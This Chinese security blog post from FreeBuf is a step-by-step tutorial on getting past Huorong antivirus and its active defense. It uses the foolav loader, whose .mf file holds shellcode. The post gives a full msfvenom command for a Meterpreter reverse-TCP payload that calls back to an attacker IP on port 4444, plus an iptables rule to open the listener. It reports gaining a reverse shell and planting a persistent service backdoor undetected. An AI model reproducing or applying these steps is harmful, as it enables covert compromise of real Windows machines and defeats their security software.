利用.MF后缀文件猥琐绕过火绒杀毒测试

2018-04-11 251331人围观 ,发现 15 个不明物体 系统安全

* 本文作者:Backspaces,本文属FreeBuf原创奖励计划,未经许可禁止转载

由于火绒杀毒软件非常“良心”,在国内就是一股清流,逐渐拥有了一大批用户。

最近在做测试,后门文件一直无法绕过火绒的主动防御,最后在Github找到个猥琐绕过火绒主防御的手法的手法,该手法亲测可以成功绕过火绒,所以分享给大家(初次发帖,实属紧张)。

@Y`GN3UH[37JFLL[39ZS@ZT.jpg

环境攻击机:

CentOS7

192.168.129.128

目标机:

装有火绒的windows10 1709(x64)

192.168.0.32

下载:https://github.com/hvqzao/foolav/releases/download/v1.0/foolav.zip

解压后会有三个文件:foolav.exe执行文件和foolav.mf文件,第三个我们不管它

首先唯一要做的是上传两个文件,一个是可执行的文件(foolav.exe),另一个则是.MF后缀文件,foolav.mf文件用来存放我们的Payload,

foolav.exe是作者写好的,当该文件被执行后,有效载荷文件(foolav.mf)将被它解析,加载到单独的线程,在内存中执行。

源码大家可以到作者的Github上下载

https://github.com/hvqzao/foolav

QQ截图20180410092012.png

foolav.mf文件默认是存放着payload的,执行后会弹出一个计算器,我们只要生成自己的payload然后替换原有的内容就好,

MF文件可以区分每一个字符以外的\xHH二进制序列。也就是说你可以在foolav.mf文件里添加你想添加的字符,比如:

ca361694-bc5b-11e5-9a31-be6847cdcec2.png

x86的payload是运行在x86和x86_64 Windows系统。 我们现在只需要生成x84的payload。Meterpreter可以使用migrate命令嫁接到x64进程中。

msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.129.128 Lport=4444 -a x86 -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf

我这里生成之后覆盖掉了原来的.mf文件

QQ截图20180409121855.png

当然还是这些熟悉的命令,如果命令没有出错,现在我们的payload已经生成并保存到了foolav.mf文件当中,然后用我们生成的foolav.mf文件覆盖下载的foolav.mf文件并发送到目标机器。

然后进行监听,等待反向Shell

QQ截图20180409122707.png

我的防火墙是打开的,所以默认屏蔽了对外端口,这里需要让iptables允许4444端口通过

iptables -I INPUT -p tcp --dport 4444 -j ACCEPT

QQ截图20180409123127.png

上传到目标机之后,我们直接用火绒对文件进行病毒扫描,如图

exe文件运行之后,我们成功获得windows10一个反向的shell

QQ截图20180409123732.png

通过此方法执行的payload得到shell后,我们甚至可以执行一些杀毒软件非常敏感的操作,就像是有白名单一样,火绒的主防御形同虚设。。。。比如我们生成一个持久性的服务后门然后再用火绒进行扫描

QQ截图20180410093208.png

QQ截图20180410094214.png

虽然该方法可以成功的绕过最新版的火绒杀毒和其主防御,但我在装有360和电脑管家的环境进行测试均被查杀…….

* 本文作者:Backspaces,本文属FreeBuf原创奖励计划,未经许可禁止转载

这些评论亮了

发表评论

已有 15 条评论

取消
Loading...
css.php